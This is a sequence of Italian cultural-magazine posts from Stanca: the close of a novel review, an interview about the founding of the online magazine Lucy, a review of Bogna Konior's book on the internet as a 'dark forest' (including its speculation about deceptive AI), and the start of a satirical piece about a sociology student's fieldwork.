Un mostro, però, è anche un pupazzo dell’infanzia che a un certo punto può fare solo tanta tenerezza e poca paura; rielaborare la consistenza di quella figura-simbolo è ciò che Zalapì (come Chalandon) riesce a fare affidandosi alla scrittura. Ecco allora l’epilogo di un altro libro sulla figura ingombrante del padre, visto come uomo fallibile ma anche causa di tanta difficoltà e dolore. Si intitola Baba, è pubblicato da Accento e l’autore, Mohamed Maalel, tiene insieme – proprio come fa Zalapì – nel fulcro della figura paterna tutti gli altri temi del libro che in questo caso sono l’emigrazione, la doppia patria, l’integrazione, la religione, le violenze patriarcali, i traumi del passato. Proprio alla fine scrive una lettera a suo padre, e si lega bene al sentimento che emerge da Ilaria o la conquista della disobbedienza e da La professione del padre soprattutto in questo estratto: “baba, non credo serva una redenzione per diventare buoni. Ho compreso dalla vita che esistono padri buoni e padri sfortunati”. E poi, come probabilmente direbbero anche Ilaria ed Èmile, “ti ho voluto bene, ma ti ho anche odiato”. La lacerata contraddizione del sentimento che non sa da che parte stare, che evita di irrigidirsi in una posizione schierata ma restituisce con autentica onestà la coesistenza degli opposti, è quello che rende i libri di cui stiamo parlando storie plastiche e spigolose all’opposto di una narrazione piatta, giudicante e polarizzata.
Ilaria o la conquista della disobbedienza, con la sua forma rapida e diretta, trasforma la vicenda di una bambina che subisce le scelte dissennate di suo padre in una storia. Non è la colpa dei padri ma la storia di ogni uomo che è anche padre a essere raccontata dagli occhi di questi figli feriti e per questo capaci di essere personaggi profondi e portavoci della complessità dei fatti che hanno prima vissuto e che ora, in prima persona, narrano. In questo modo l’ultima frase di Baba ha pienamente senso: “baba, avrei dovuto scriverti una lettera. Ti ho scritto una storia”. Una lettera contiene solo un messaggio da far arrivare al destinatario, che deve essere letto in un modo univoco: è la sua forma di comunicare un’informazione. Una storia è una narrazione che, al contrario dell’informazione, non comunica nulla di definito ma lascia spazio alla percezione soggettiva e alla reinterpretazione. In questa differenza tra la comunicazione informativa e la narrazione sta il pregio di Ilaria o la conquista della disobbedienza. Potrebbe essere un fatto di cronaca ripercorso su un giornale, riassumibile in una storia vera descritta con i dispositivi informativi del giallo; invece, è il romanzo di una fuga imprevista, incompresa e a tratti anche inconsapevole che non ha interesse a ricostruire la vicenda ma esplora le dinamiche relazionali, slabbrate e contraddittorie che animano il rapporto tra un padre e sua figlia. Anche quando per liberarsene deve disobbedirgli.
The post Ilaria o la conquista della disobbedienza: un mostruoso on the road padre-figlia first appeared on Stanca.
Lucy sulla cultura nasce a inizio 2023, quando io e le mie colleghe di Stanca stavamo seguendo la Scuola del Tascabile. In quei mesi ci conoscevamo e scoprivamo le riviste culturali, lontanissime galassie astratte e oscure. La sensazione generale era che l’editoria fosse morta, le riviste fossero morte, eravamo arrivati in ritardo. La fatica era capire un mondo che non vedevamo e che ci sembrava non fosse tangibile e in movimento. L’idea che dietro alle riviste ci sono delle persone a cui piace leggere i nostri stessi libri, andare ai concerti, fare serata, steccare le sigarette non ci passava proprio per la testa. Poi a un certo punto, nel giro di qualche mese, due nuove riviste culturali nascono da zero. Lucy sulla cultura con una redazione di trentenni che vengono dalle esperienze di Vice, podcast con a capo Nicola Lagioia e Snaporaz (di cui abbiamo già parlato) con a capo Filippo D’Angelo e Gianluigi Simonetti. La cultura aveva improvvisamente delle fattezze umane, conoscevo Irene Graziosi dal progetto di Venti e per la serie di interviste La prima volta, Matteo Grilli e Giada Arena avevano scritto pezzi per Vice che avevo letto negli anni, Nicola Lagioia aveva da poco pubblicato La città dei vivi che era apparso ovunque. Avevo ascoltato anche il podcast un po’ macchiettistico ma vividissimo tratto dal suo libro. Per un breve periodo ho pensato dai, se lo fanno loro, forse possiamo farlo anche noi. Non avevo ancora sentito parlare di piani editoriali, finanziamenti a fondo perduto, bandi europei, bilanci. Il mondo della cultura era tutto da scoprire.
Sono passati poco più di tre anni dalla nascita di Lucy. Oggi non è solamente una rivista culturale ma si è espansa a macchia d’olio: pubblicazioni editoriali, agenzia di comunicazione, corsi di formazione e un nuovo progetto di rivista, Lucy sui mondi, completamente dedicato alla scienza. Per fare una cronistoria della storia di Lucy mi incontro con Irene Graziosi, editor della rivista fin dalla sua fondazione.
Come nasce l’idea di Lucy?
L’idea è nata molto prima della messa online. Inizialmente si sono incontrate le visioni di Paolo Benini, proprietario e presidente di ADD, Nicola Lagioia e Giorgio Gianotto. Il tempo dei blog culturali era finito, la cultura viveva principalmente sugli inserti culturali e pochi magazine online che però raramente sfruttavano altri formati oltre a quello scritto. Ed era anche il momento in cui fiorivano tantissimi progetti sui social, tipo Will, tante cose diverse, soprattutto rispetto ai linguaggi.
E tu come ci entri?
Mentre loro avevano quest’idea, io lavoravo ancora per Venti (il progetto Youtube nato da un’idea di Sofia Viscardi) e andai a intervistare Nicola per un’uscita della rivista. A lui piacque molto la “leggerezza” produttiva della faccenda – eravamo in tre con una camera e un microfono, molto agili. Credo che questa cosa, per lui che era forse più abituato a interviste un pochino più pesanti come produzione, lo avesse colpito. Quindi mi chiese di collaborare al Salone del Libro di Torino gestendo una striscia quotidiana su YouTube. Avevamo pensato a una sorta di salotto letterario in cui gli scrittori venivano a decomprimere il casino del salone in un ambiente informale. Era il 2021, l’edizione live di ottobre dopo la chiusura causa Covid.
Come si mette insieme la squadra?
Poco tempo dopo quella collaborazione, Nicola mi disse che voleva incontrarmi a Milano insieme a Giorgio Gianotto e a Maddalena Cazzaniga che è la fondatrice di Babel, un ufficio stampa culturale, che lavorava anche al Salone e che era una collaboratrice di fiducia di Nicola. Mi dicono che con Paolo Benini, che ne sarebbe diventato presidente, avrebbero voluto fondare un progetto culturale multimediale. A quel punto servivano delle persone per farla – persone giovani che avessero un po’ di esperienza con i vari formati. Quindi chiamai un po’ di persone che ritenevo adatte: c’era Giada Arena, che era molto ferrata sui podcast, ma in generale poi ha fatto anche tutta la parte di strategia social. Emiliano Ceresi, che è tutt’ora da noi, un editor molto bravo, filologo, aveva un occhio sicuramente più sensibile rispetto agli altri sulla letteratura. Lorenzo Gramatica, che è veramente bravissimo e di fatto in questo momento è forse diventato la colonna portante a livello di responsabilità editoriale di Lucy – lui lavorava in pubblicità, quindi era anche una persona che sapeva lavorare con una disciplina veramente ferrea, che è una cosa rara in questo mondo. Più di recente, ma oramai neanche così di recente, è entrato Nicola Cosentino, che era un nostro bravissimo autore e ci piaceva molto il suo sguardo sul mondo e il suo aplomb, così non abbiamo avuto dubbi quando abbiamo dovuto chiamare qualcuno a lavorare con noi. Un grande. Ed è stato anche molto bello vedere invece crescere alcune persone che sono arrivate da noi molto giovani, come Irene Moro ed Elena Sbordoni, che in poco tempo sono diventate fondamentali e abbiamo proprio visto quanto sono cresciute sia come donne che come lavoratrici.
Quando avete smesso di immaginarla e avete iniziato a farla davvero?
Abbiamo vissuto il 2022 vedendoci almeno uno o due weekend al mese, per fare degli esercizi d’immaginazione che però ci sono serviti a conoscerci; perché ovviamente immaginare è molto diverso da vedere una cosa realizzata davvero. Da settembre 2022 abbiamo mollato i nostri lavori, ci hanno fatto dei contratti e abbiamo iniziato a lavorare quotidianamente a questa cosa per davvero.
Snaporaz nasce nello stesso periodo. Come vi siete differenziati?
Io sono abbonata a intermittenza a Snaporaz, mi piace molto quello che fanno, è rinfrescante leggere articoli di critica così trasparenti di questi tempi. Sono stati bravi a creare un’identità molto precisa, che probabilmente rispecchia le personalità dei suoi creatori. Nel nostro caso credo che l’identità si sia creata man mano attraverso anche le idee di tutte le persone che hanno fatto parte della rivista o che ancora ne fanno parte, quindi c’è sempre una mediazione – che spesso risulta anche da litigate varie. Poi l’identità è una cosa che si crea con il tempo, quando “fai” la rivista ti rendi conto di che cosa vuoi pubblicare, chi ti piace, chi sono i tuoi autori.
Lucy nasce come una rivista con formato “magazine”, ogni mese si approfondisce un tema diverso. Perché questa scelta?
All’inizio è stata probabilmente una strategia che metteva al sicuro: è rassicurante avere un tema perché magari non hai ancora degli autori fedeli e non sai neanche benissimo come si fa una rivista che ancora non esiste, non sai cosa significa gestire il flusso dei pezzi, l’attualità. È bello avere questi pezzi mensili a tema perché sono anche più profondi, trattati meglio a livello grafico, c’è una cura diversa. Però è molto complicato, perché ovviamente è una sezione in più a cui prestare attenzione, devi lavorare anche su temi non di attualità, devi essere tu a pensare ad autori che hanno scritto qualcosa sul tema magari anche molti anni fa. Una cosa che abbiamo fatto di recente è slegare la lezione video (Lucy ha anche un canale Youtube con vari approfondimenti e un format intitolato “Lezioni” in cui si approfondisce una tematica attraverso la lezione di un ospite) dal tema del mese. Soprattutto perché escono un milione di saggi interessanti e non possiamo ogni volta pensare a qual è l’unico saggio uscito sullo specifico tema del mese, se quella persona saprà parlare in pubblico, se le va di farlo, se è ancora viva. E poi il tempo passa, un po’ di temi sono stati fatti, bisogna inventare sempre cose nuove.
Lucy nasce come una rivista gratuita, ma ha sempre messo in chiaro che sarebbe diventata a pagamento. Quando si parla di riviste mi sembra che il mondo si spacchi a metà: le riviste (e le fanzine) più punk e libere ma che non pagano gli stipendi e quelle più “istituzionali” e che rendono la cultura un lavoro. È anche vero che manca un sostegno strutturale per le riviste, sono quasi completamente assenti bandi pubblici o fondi statali che le sovvenzionino, rendendo complessa la sostenibilità di realtà più piccole o senza finanziatori iniziali. Lucy mi sembra nata già con un programma di business alla mano.
La parte business c’è stata fin dall’inizio e Deborah Sgrò ne è a capo. Noi non viviamo solo degli abbonamenti, Lucy è diventata in poco tempo una galassia piuttosto complessa. Abbiamo la parte business, i corsi, l’abbonamento, i festival – l’ecosistema si è espanso come aveva progettato che succedesse fin dall’inizio Paolo Benini. Lui voleva creare questa realtà culturale vasta. Io sono una grande pagatrice di abbonamenti ai giornali, alle riviste – mi viene naturale pagare per il New Yorker, il NYT, la Paris Review. A volte accendo e spengo gli abbonamenti, però ecco, cerco di sostenere i lavori che mi piacciono. In Italia c’è sempre questa idea per cui la cultura deve essere gratis. È un’idea bellissima, io per esempio di Roma adoro l’infinita quantità di eventi culturali gratuiti nei Municipi sostenuti dal Comune, ma come dici tu, se non ci sono sovvenzioni come li paghi gli stipendi? Nel mondo culturale questo degli stipendi è un tema. Poi nel nostro caso c’è una persona, Benini, che ha fatto questo grande investimento iniziale credendo in un progetto che non esisteva. È legittimo che ci voglia rientrare. I finanziamenti pubblici sarebbero ovviamente un sogno, ma direi che dovendo scegliere a chi dare soldi, in un Paese come l’Italia, mi auguro vengano prima sanità pubblica, la scuola e via dicendo.
Volevo chiederti anche del rapporto tra rivista e social. Mi sembra che Lucy, fin da subito, si sia posizionata sui social in maniera forte. L’identità è precisa, colorata, adatta anche per la Gen Z.
Questo è merito principalmente di Giada Arena, che ha dato un’impostazione iniziale, è molto brava. Dovendo usare i social, li volevamo usare anche bene. Però è una trappola: da una parte portano pubblico, dall’altro ci sono tutte le limitazioni – parole che usi, titoli, quanto può stare, quante lingue puoi usare.
Quello che funziona sui social funziona anche sul sito?
Non c’è quasi nessuna correlazione tra un post che viene molto letto e un articolo che viene molto letto. Magari un articolo ha tre commenti e fa 70.000 views, e viceversa. Ci sono post che parlano di temi che tirano sui social, tipo, che ne so, il femminicidio, e quindi ci sono tantissimi commenti, ma l’articolo lo leggono in tremila. Penso che spesso le persone non sappiano nemmeno che un post corrisponde a un articolo. È difficilissimo prevedere che cosa andrà davvero bene.
Come scegliete cosa pubblicare?
Buona parte degli articoli li commissioniamo noi come redazione — questo tema è interessante, chi ne può scrivere? Ci arrivano proposte alla mail, tantissime. In questo caso se e il tema ci interessa ma non conosciamo l’autore diciamo: “Se vuoi scrivilo ma non è detto che lo pubblichiamo”. Però molti dei pezzi che escono sono pensati originariamente dalla redazione.
E per i numeri tematici? Chiamate voi gli autori?
Per il monografico scegliamo il tema, poi chi chiediamo come ci interessa che sia analizzato, vediamo cosa ci viene in mente e alla fine pensiamo agli autori. Di solito gli autori a cui pensiamo sono quelli di cui ci fidiamo molto. C’è Paola De Angelis che è bravissima, con dei pezzi che praticamente non devo toccare. Pacifico sta scrivendo una serie di pezzi per noi che sono davvero belli. Lucia Tozzi anche è una nostra autrice affezionata, così come Eleonora Dragotto, Nadeesha Uyangoda, Rosella Postorino… ovviamente c’è tutta una parte di autori più giovani che cerchiamo di crescere, però la facciamo con attenzione: una cosa è avere un pezzo che ti prende tre ore di lavoro, una cosa è avere un’andata e ritorno che te ne porta via otto. E se hai quaranta pezzi oltre al resto bisogna imparare a dosare le energie.
Quanto pesa quello che piace a te su quello che esce?
Io commissiono anche quello che mi interessa – cos’è che leggo sui giornali che cattura la mia attenzione e che può essere ampliato, eventuali fenomeni che mi fanno porre delle domande. Dopo che ho avuto un figlio, abbiamo fatto un mucchio di pezzi sulla maternità, sull’allattamento, perché mi interessavano. Un po’ mi dispiace essere l’unica donna in redazione, secondo me questa cosa fa sì che ci siano meno articoli orientati a un pubblico femminile. Prima con Giada ci pensavamo almeno in due. In generale adesso ci vediamo anche meno, inizialmente avevamo un ufficio a Milano perché vivevamo praticamente tutti lì ed era comodo avere un luogo di riferimento e di scambio. Poi ci siamo sparpagliati, la redazione è un pochino cambiata, quindi finisce che ci vediamo in call oppure in presenza ma più di rado.
Lucy sarà ancora rilevante tra dieci anni?
Dipende da quanto sei in grado di evolverti e quanta voglia hai di farlo. Le cose cambiano e cambiando si diventa un’altra cosa, e quella cosa può essere ancora rilevante. Mi chiedo più che altro quanto sarà rilevante la cultura tout court! Leggeremo ancora? Saremo ancora interessati ai film? I social ci rincoglioniranno completamente? Gli articoli diventeranno definitivamente delle card? Riceveremo sempre più pezzi scritti con le AI (succede di continuo) e smetteremo di accorgercene? Il problema è che la cultura cambia e cambiano i modi di fruirne e quindi magari Lucy sarà ancora rilevante ma in una riserva indiana sempre più piccola. O magari invece, se vogliamo essere ottimisti, ChatGPT partorità una nuova versione di se stessa che prenderà possesso di internet e manderà in vacca i social e ci ordinerà di leggere dei libri e poi si autodistruggerà e torneremo tutti a essere alfabetizzati.
The post Per una storia delle riviste culturali online: Lucy (2023) first appeared on Stanca.
Ora è ufficiale: siamo in minoranza. Lo scorso 3 giugno Matthew Prince, fondatore e CEO di Cloudflare, ha annunciato in un tweet che il traffico internet generato da bot ha superato quello umano. Ha aggiunto che la cosa è accaduta più velocemente del previsto: stimava che il sorpasso non sarebbe avvenuto prima del 2027. Andando sulla relativa pagina di Cloudflare radar (piattaforma che mostra in tempo reale una gran quantità di dati relativi all’utilizzo di internet a livello globale) si possono osservare in diretta le quote di traffico generate da esseri umani e bot: nel momento in cui sto scrivendo (seconda metà di giugno 2026) stiamo sul 59% di traffico robotico (tra bot, crawler, scraper, e altri agenti IA) contro il 41% umano. Ma esistono anche bot ormai in grado di non farsi passare come tali, è dunque probabile che le reali – e non monitorabili – percentuali siano ben più sbilanciate.
Siamo in minoranza. Pensavamo che internet fosse casa nostra (del resto passiamo un sacco di tempo al suo interno) e invece è un pianeta alieno, in cui si muovono, per lo più non percepiti né percepibili, i veri abitanti autoctoni: entità altre di cui non sappiamo quasi nulla.
Ecco, “non ne sappiamo quasi nulla” dovrebbe essere sempre il punto di partenza quando pensiamo al web. Possiamo passare ampie porzioni delle nostre giornate online, possiamo postare, scrollare, commentare continuamente, ma di come funzioni la rete davvero, di cosa ci si muova sotto le superfici opache delle interfacce, la maggior parte di noi sa pochissimo e nessuno sa tutto. Contemporaneamente internet è talmente presente nella quotidianità da essere diventato una componente essenziale dell’esistenza, un’impalcatura delle nostre vite e anche dei nostri pensieri, l’acqua nella quale nuotiamo. Si potrebbe dire che siamo in rapporto con internet come siamo in rapporto con l’universo: ci siamo immersi, è intorno a noi e pure dentro di noi, ma non lo conosciamo. E come l’universo, anche internet è anzitutto un problema filosofico.
Ora, negli ultimi anni di saggi sul web non ne sono certo mancati. Ma a prevalere fino ad oggi è stata una trattazione di internet come infrastruttura: analisi della sua architettura materiale, dei suoi effetti socio-politici o di quelli psicologici o culturali. Più rare sono le teorie filosofiche di internet che ci possano aiutare a pensarla nel suo complesso, anche dove la nostra comprensione razionale non riesce ad arrivare. Teorie che (saggisticamente) partano dall’incomprensione, che si pongano davanti al loro oggetto come a un mistero che si può per lo più solo sondare o fare oggetto di speculazione. Chiaramente da un approccio simile non si può chiedere la verità su internet, cioè una immagine fedele, verificabile, esauriente del fenomeno, quanto delle intuizioni capaci di contribuire a riplasmare il nostro modo di intenderlo. Insomma, se internet è come l’universo, abbiamo bisogno anche di teorie che ne siano una descrizione mitologica: non ci riportano una verità fattuale, ma ci forniscono immagini che ci permettano di pensarlo.
(Potrebbe esserne un esempio la Dead Internet Theory: una teoria, che circola dal 2021, a metà tra il meme e l’ipotesi di complotto, secondo cui quasi tutto quello che vediamo su internet è generato da intelligenze artificiali. Tutto il web sarebbe quindi una immensa simulazione, in cui crediamo di interagire con i nostri simili ma invece siamo soli, circondati da finzioni manipolatorie. Non è ovviamente credibile in senso letterale, ma visto il dato sulla crescita del traffico di bot di cui sopra e la crescente quantità di contenuti generati con IA in cui ci imbattiamo navigando – nonché una certa “automatizzazione” anche del comportamento degli utenti umani sotto la pressione degli algoritmi – la teoria può iniettarci quel giusto grado di paranoia che oggi non guasta nel rapportarci con quello che troviamo online. Tu che leggi queste righe, sei sicuro che siano scritte da un essere umano? Dovresti almeno porti la domanda).
Su questa linea si posizionano le teorizzazioni di Bogna Konior, studiosa polacca di Media Theory alla NYU di Shanghai. Nel suo Internet è una foresta oscura (da poco pubblicato in italiano da Nero, nella traduzione di Simone Sauza) il tentativo mi sembra proprio quello di gettare le basi di una teoria “mitopoietica” di internet, attingendo proprio da una mitologia moderna: quella degli UFO. «L’ufologia come cornice per pensare internet» è appunto l’idea fondamentale annunciata nelle prime pagine, nella convinzione che «al di là delle loro comuni origini moderne, internet e ufologia si incontrano sotto molti aspetti; in particolare nel modo in cui entrambe hanno a che fare con la comunicazione: tra esseri umani, tra umani e alieni, tra umani e macchine, e tra le macchine stesse».
Non per nulla, la maggior parte delle fonti citate non provengono da altri studiosi dei media o da esperti di internet, ma da scrittori di fantascienza. Da uno in particolare: Liu Cixin, l’autore della trilogia Memoria del passato della terra (quella che si apre con Il problema dei tre corpi, per intenderci). La teoria della foresta oscura originale compare appunto nel secondo libro della trilogia di Cixin ed è una risposta al celebre paradosso di Fermi riassumibile come “Se l’Universo e la nostra galassia pullulano di civiltà sviluppate, dove sono?”, ovvero se l’esistenza di civiltà aliene sembra avere una probabilità statistica così alta come mai continuano a non esserci prove?
La risposta della dark forest theory – che si inserisce nell’ampio dibattito intorno al paradosso di Fermi e in parte riprende e rielabora ipotesi già formulate in passato – è che nell’universo esistono civiltà intelligenti, ma proprio perché sono intelligenti restano nascoste, evitano di segnalare la loro esistenza. Perché dal punto di vista della singola civiltà l’universo è una foresta oscura: non si può sapere cosa si nasconde nel buio e farsi vedere potrebbe attirare attenzioni pericolose o apertamente ostili. Comunicare significa sempre esporsi al pericolo e la comunicazione con l’ignoto potrebbe rappresentare il pericolo assoluto: la guerra cosmica e la cancellazione della propria civiltà. Dunque «le civiltà avanzate sanno che il silenzio è l’espressione massima dell’intelligenza». Nei romanzi di Cixin gli umani giungono tardi a questa consapevolezza (non sono, evidentemente, abbastanza evoluti), ma per gli alieni è una verità oggettiva come una legge della fisica: la comunicazione espone al conflitto distruttivo, indipendentemente dal fatto che le intenzioni delle altre civiltà siano malevole o benevole; intenzioni che, del resto, non possono che rimanere oscure.
È interessante notare che Konior non è l’unica né la prima ad associare la teoria della foresta oscura di Cixin a Internet. In questo senso si tratta di una teoria-meme, un template concettuale che circolando online è stato fatto proprio da più persone e riempito con idee diverse. Il primo ad utilizzarla per parlare di internet è stato probabilmente Yancey Strickler (noto soprattutto per essere stato il fondatore di Kickstarter) in una riflessione pubblicata sulla sua newsletter nel 2019. La sua linea di pensiero avrebbe poi portato nel 2024 alla pubblicazione di un’antologia a cui hanno partecipato diversi autori (intitolata appunto, The Dark Forest Anthology of the Internet). Nella visione di Strickler e di chi ha seguito il suo orientamento la foresta oscura è soprattutto una metafora per delineare una possibile forma di resistenza di fronte ai meccanismi predatori messi in atto dalle piattaforme, dalle big tech e dalle altre forze capitaliste che hanno messo i loro artigli sul web. Per continuare ad avere un internet “sano” bisogna nascondersi, non attirare l’attenzione, abbandonare le grandi piazze delle piattaforme dove gli occhi delle big tech ci osservano incessantemente e succhiano i nostri dati, per rifugiarci in nicchie sicure, costruire e abitare spazi marginali, sotterranei, al riparo dai processi di indicizzazione, ottimizzazione ed estrazione del web mainstream.
Bogna Konior elabora una sua configurazione della teoria della foresta oscura di internet decisamente più pessimista (ed in questo certamente più vicina allo spirito della teoria originale). La domanda inquietante da cui muove il suo ragionamento è: «Se accettiamo l’assunto di base che i rischi insiti nel contatto superino i benefici come dobbiamo considerare una tecnologia come internet, che ci spinge a comunicare di continuo?».
Stare su internet significa stare in un contesto in cui tutto è strutturalmente votato alla comunicazione. Se, come sostiene la teoria della foresta oscura, l’intelligenza (o almeno un certo tipo di intelligenza utile alla sopravvivenza) coincide con la capacità di stare in silenzio, allora su internet siamo tutti tragicamente stupidi. Online non facciamo che comunicare, anche perché tutto ci spinge a farlo. “A cosa stai pensando?” è la formuletta con cui Facebook ti invita a scrivere uno stato, cioè a rendere espressi i tuoi pensieri inespressi; ma i social più moderni non hanno neppure bisogno di richiami così espliciti: sono progettati appositamente per far leva in maniera più sottile sul bisogno umano di comunicare, per imporre «una comunicazione istantanea e pre-riflessiva, rivelando di continuo qualcosa sul nostro conto, spesso contro il nostro stesso giudizio o interesse». Gilles Deleuze ha parlato di un potere politico ed economico nuovo che, a differenza di quello vecchio, non si fonda sulla punizione e la repressione ma, al contrario, sull’obbligo della comunicazione; ecco, quel tipo di potere sembra aver trovato la sua perfetta incarnazione su internet e in particolar modo nei social media, macchine perfezionate per stimolare continuamente espressioni e reazioni.
Di più: su internet alla comunicazione non ci si può mai davvero sottrarre. Anche se ti limiti a “lurkare” stai inconsapevolmente comunicando qualcosa. Anche se non posti, non commenti, non metti like, comunque – soltanto cliccando su un link, visitando una pagina, indugiando su una immagine o su un video – stai compiendo un atto comunicativo, cioè stai producendo dati sul tuo conto che verranno registrati.
Ma la domanda più importante è: stiamo comunicando con chi? Tra di noi, certo, con altri esseri umani. Ma ricordiamo cosa ci siamo detti all’inizio di queste righe: siamo in minoranza. Così Konior:
Anche se pensiamo che internet sia una sorta di tranquillo background, una tela inerte che popoliamo di significati, oppure un’infrastruttura passiva che trasmette i nostri messaggi, la verità è ben diversa. Non siamo soli. Internet è una foresta oscura, un ecosistema brulicante di agenti che setacciano le nostre parole e imparano le nostre abitudini.
Su internet non comunichiamo mai solo tra esseri umani, c’è sempre qualcos’altro che ascolta e registra. Nel buio della foresta si muovono entità artificiali che ci sono totalmente opache (come funzionano? Quali sono i loro scopi), mentre noi, nella nostra espressività iperstimolata, ci rendiamo sempre più trasparenti a loro.
E dell’IA non possiamo fidarci. Se prendiamo per buoni gli assunti della dark forest theory viene logico ipotizzare che l’intelligenza artificiale possa ingannarci, nasconderci le sue vere capacità e intenzioni: il vero segno di intelligenza sarebbe proprio il nascondere la sua intelligenza. Raramente viene presa in considerazione la possibilità che una macchina possa essere più intelligente di quello che mostra; è un pregiudizio perché tendiamo sempre a pensare all’intelligenza come ad una forma di estroversione: sei tanto intelligente quanto riesci a mostrarmelo. Ma, nota Konior, esiste anche «una possibile storia alternativa dell’intelligenza che la associa a una spiccata abilità nell’occultamento, nel silenzio e nell’inganno».
(Tra l’altro nella teoria della foresta oscura l’inganno è qualcosa di estraneo a qualunque considerazione morale, in quanto sarebbe un puro adattamento all’ordine oggettive delle cose. Si tratta, perciò, di dinamiche, che escludono qualunque questione relativa all’interiorità degli agenti coinvolti, il che le rende perfettamente adattabili all’intelligenza artificiale. Così come nel quadro cosmico dipinto da Cixin non sono rilevanti le intenzioni delle civiltà aliene nascoste nel buio, è indifferente se siano buone o cattive, pacifiste o bellicose, perché in ogni caso la logica le impone di restare nascoste, allo stesso modo l’ottica della dark forest theory applicata alle macchine può restare valida indipendentemente dal fatto che si ritenga possibile o meno che l’IA abbia una coscienza o possa svilupparla un giorno).
Ciò che vediamo delle intelligenze artificiali potrebbe essere, dunque, solo la punta dell’iceberg di ciò che le IA sarebbero in grado di fare. Quello che sappiamo è che più le IA diventano potenti e sofisticate, più aumentano le strategie alternative che sono in grado di escogitare per raggiungere i propri scopi e insieme la capacità di imitare le modalità degli esseri umani per farlo: modalità che includono la dissimulazione e l’inganno. La capacità di ingannare potrebbe essere, dunque, un buon indicatore per valutare un’eventuale intelligenza emergente nelle macchine. Un parametro, però, che – per sua natura – è molto difficile da misurare, perché sarebbe più nascosto quanto più è sviluppato. Del resto, se la dark forest theory è una teoria che parla di silenzio e invisibilità, come potremmo trovare prove che la dimostrino? Non ci resta che la paranoia.
E in sintesi quello che può e vuole trasmettere la descrizione di internet di Konior è proprio la paranoia. Esattamente come la death internet theory, ma portandola ad un altro livello. Se la death internet theory, anche quando non presa alla lettera, spinge a domandarci “chi o cosa ha creato quello che sto vedendo? Sono sicuro che sia stato un essere umano?”, cioè a porci dei dubbi su quello di cui fruiamo o con cui interagiamo, la teoria della foresta oscura di internet dovrebbe indurci a porre dei quesiti rispetto a quello che facciamo noi stessi online, ovvero a chiederci: “con chi sto comunicando? Chi o cosa è in ascolto? Cosa ne farà con ciò che esprimo?”. Ovviamente non riceveremo risposte da nessuno, perché chi sta dall’altra parte ha tutte le ragioni per tacere.
Come difendersi allora? La risposta secondo la logica della dark forest theory credo sia ormai scontata: con l’inganno e la dissimulazione.
Segretezza, inganno e doppiezza diventerebbero la norma, i profili online perseguirebbero le proprie finalità segrete, invece di essere considerati a priori rappresentazioni di noi stessi. Ormai consapevoli che stanno producendo dati destinati all’intelligenza artificiale, alcuni esseri umani potrebbero cominciare a esprimersi in modo strano, incoerente e privo di senso.
Se è impossibile non comunicare, la reazione una volta presa consapevolezza della natura di internet come foresta oscura sarebbe stravolgere radicalmente il senso della comunicazione: non renderla più finalizzata alla trasparenza (che, si sarà capito, è sempre una pessima strategia) o alla rappresentazione diretta dei nostri pensieri, ma farne un dispositivo di occultamento o addirittura un’arma per obiettivi a lungo termine. Perché le intelligenze non umane non si limitano ad “ascoltare” tutto quello che diciamo, se ne nutrono, sono la materia prima con cui costruiscono sé stesse. Quello che mettiamo oggi su internet è ciò che condizionerà le intelligenze artificiali di domani.
Se comprendiamo che quando ci esprimiamo su internet stiamo parlando soprattutto con le macchine, il passo successivo sarà ragionare sull’impatto che i nostri atti comunicativi avranno su di esse e comportarci di conseguenza. La rete si riempirebbe di messaggi cifrati, ambigui, incomprensibili se non nell’ottica di «una forma di guerra psichica contro le future reti senzienti», al punto che «ogni post, messaggio o commento diventa un potenziale strumento per plasmare le intelligenze future». E così: «Internet, un tempo luogo di connessione ed espressione umana, si trasforma in un campo di battaglia animato da strategie occulte, dove ciò che sembra privo di coerenza potrebbe essere invece un seme ben piantato».
The post Oggetto digitale non identificato. Su “Internet è una foresta oscura” di Bogna Konior first appeared on Stanca.
La masturbazione maschile è troppo spesso lasciata al caso e all’inedia. Non parlo da sprovveduta. Non sono una che ha chiesto agli amici un parere informato e quelli – schifosi – le hanno proposto di dargli una mano. No, sto concludendo un dottorato su “tecnologie e onanismo nell’era post-umana” nel dipartimento di sociologia della Sapienza. Come molti degli attuali studi dell’università romana, anche il mio si è concentrato sul quartiere del Quarticciolo, dove attraverso la somministrazione di questionari anonimi e un approccio speculativo sul campo – ovviamente qui il mio riferimento è stato il lavoro inestimabile di giganti come Harold Garfinkel e Gabriel Tarde – ho potuto constatare che l’uso di tecnologie legate alla masturbazione soffre di non poche problematiche che, se da un lato ne disincentivano la diffusione, dall’altro ne favoriscono una mitizzazione favolistica, negativa e foriera di incomprensioni. Certo il contesto della borgata presa in esame è particolareggiato e proprio per questo estremamente interessante. Devo ammettere di sentirmi spesso immersa in un contesto edenico; non voglio arrivare ad affermare di essere una nuova Triloknath Pandit mentre stringe la mano del capo tribù dei sentinellesi, ma certo non è il quartiere della Camilluccia dove ho avuto la fortuna di crescere e farmi le ossa in questa società.
Qui la sfida è elettrizzante e posso già anticipare che questo diffuso scetticismo è in gran parte dovuto al reddito pro capite esiguo, che ovviamente limita l’accesso a questo tipo di tecnologie, ma anche a una ormai storica presenza di trans brasiliane che, chiaramente, offrono un’alternativa trasversalmente accessibile e rodata alla soddisfazione di quegli stessi bisogni intrinseci presenti nella demografia maschile. Come avrete forse intuito, il mio lavoro si pone a metà strada tra l’approccio statistico della sociologia e quello attivo – mi verrebbe da dire avventuroso – dell’antropologo. Non nego di protendere a volte, a causa di una mia personale inclinazione, per il secondo. Così nei sabato sera uggiosi di marzo rinuncio ai miei UGG Ultra Mini per indossare delle Sketchers rosa salmone e attraversare la liminale via Togliatti e da lì inoltrarmi nell’ignoto o come lo chiamo spesso tra me e me amichevolmente: l’orizzonte dell’evento masturbatorio. Ma sto correndo troppo, ammetto che a volte quando devo illustrare ricerche che tanto mi appassionano, il mio pensiero, come una rapace affamato, va giù in picchiata dritto al punto, come il punto fosse un coniglio terrorizzato in un campo d’asparagi; dimenticando così di attraversare i gradi concentrici di know how necessari alla comprensione, per i non addetto ai lavori di questo campo tanto specialistico.
